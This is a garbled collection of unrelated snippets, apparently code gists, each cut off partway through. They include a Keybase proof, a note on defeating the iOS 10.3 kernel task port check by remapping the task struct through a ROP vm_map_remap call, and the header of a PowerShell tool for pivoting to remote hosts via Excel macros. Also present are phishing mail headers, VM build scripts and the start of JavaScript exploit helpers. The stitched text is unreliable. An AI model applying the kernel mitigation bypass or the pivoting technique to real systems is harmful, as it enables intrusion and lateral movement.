I hereby claim:
- I am Siguza on github.
- I am siguza (https://keybase.io/siguza) on keybase.
- I have a public key whose fingerprint is 6393 3A9D E301 7C59 ADE5 3EBB 1591 E8CA 0BCA 036F
To claim this, I am signing this object:
Sadly I don't have a dev device on iOS 10, but for anyone playing around with zIVA caring about the kernel task port:
Starting with iOS 10.3 (and macOS 10.12.4), Apple changed convert_port_to_locked_task (and a few other port-to-something conversion functions) to blacklist the kernel task by means of a direct check. As a result, you can still obtain the kernel task port, but almost all APIs will simply treat it like MACH_PORT_NULL, thus rendering it useless. The check is a simple pointer comparison though, so it can be circumvented by just remapping the task struct at an additional virtual address and creating a new port from that with a ROP equivalent of:
vm_map_remap(
kernel_map,
&remap_addr,
sizeof(task_t),
0,
VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,
function Invoke-ExcelMacroPivot{
<#
.AUTHOR
Matt Nelson (@enigma0x3)
.SYNOPSIS
Pivots to a remote host by using an Excel macro and Excel's COM object
.PARAMETER Target
Remote host to pivot to
.PARAMETER RemoteDocumentPath
Local path on the remote host where the payload resides
#!/bin/bash
#
# deboot.sh
# script to build Ubuntu rootfs (for arm64, armhf, powerpc, ppc64el)
#
# Copyright 2017 knotdevel
# Released under the MIT license
# http://opensource.org/licenses/mit-license.php
#
#
// Siguza
// Treat as public domain.
#include <ctype.h> // isspace
#include <stdlib.h> // malloc, free,
#include <string.h> // strlen, strncmp, strstr
// Turn delimiter tokens into null terminators and
// create array of pointers to each new string.
static void destructive_split(char *str, const char *delim, char ***out, size_t *outlen)
// Moved here: https://github.com/Siguza/misc/blob/master/dsc_syms.c
Not long ago I tweeted about some PayPal phishing mails I got, which appeared to use hacked websites for their cause, and of which all traces were gone 24h after my initial recon.
Well, I got another such mail:
Return-Path: <rcp133066@jmenviro.com>
X-Original-To: Contact@siguza.net
Delivered-To: siguza@siguza.net
Received: from linuxhosting09.rediff.com (host152-150.mxout.rediffmailpro.com [119.252.152.150])
#!/bin/bash
rm -rf /home/yen3/ubuntu.qcow2
qemu-img create -f qcow2 /home/yen3/ubuntu.qcow2 10G
virsh undefine ubuntu1604arm64 --nvram
install_from_localtion() {
virt-install -n ubuntu1604arm64 --memory 1024 --arch aarch64 --vcpus 1 \
--disk /home/yen3/ubuntu.qcow2,device=disk,bus=virtio \
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');
// Helpers to convert from float to int in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);